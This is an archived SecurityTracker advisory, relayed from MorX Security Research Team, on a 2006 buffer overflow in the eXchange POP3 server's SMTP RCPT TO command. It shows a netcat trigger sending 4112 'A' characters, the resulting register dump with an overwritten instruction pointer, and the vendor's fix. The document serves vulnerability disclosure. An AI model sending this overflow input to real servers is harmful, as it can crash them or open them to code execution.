SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   eXchange POP3 Vendors:   Kinesphere Corporation
eXchange POP3 Server Buffer Overflow in SMTP RCPT TO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015580
SecurityTracker URL:  http://securitytracker.com/id/1015580
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0 (build 050203)
Description:   securma massine from MorX Security Research Team reported a vulnerability in eXchange POP3. A remote user can execute arbitrary code on the target system.

A remote user can connect to the target SMTP service and send a specially crafted SMTP RCPT TO command parameter to trigger a buffer overflow. This can be exploited to execute arbitrary code on the target system.

A demonstration exploit command is provided:

rcpt to:<AAAAAA....("A"x4112)

The vendor was notified on January 16, 2006.

A demonstration exploit is available at:

http://www.morx.org/expl5.txt

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (5.0 build 060125), available at:

http://www.exchangepop3.com/

Vendor URL:  www.exchangepop3.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Exchangepop3 v5 rcpt buffer overflow vulnerability


Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org
 
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from Internet POP3 
email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a large 
buffer, allow remote users to set a new Instruction Pointer to execute arbitrary code 
and gain access on system.
 
C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
41414141 ??               ???
 
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
 
Affected platform(s):
Windows
 
Exploit/Proof of Concept:
http://www.morx.org/expl5.txt
 
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/
 
History:
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerabilty
02/02/2006  vendor released the fixed build
 
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.
 
Greets:
Greets to undisputed and  all MorX members.
 

 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC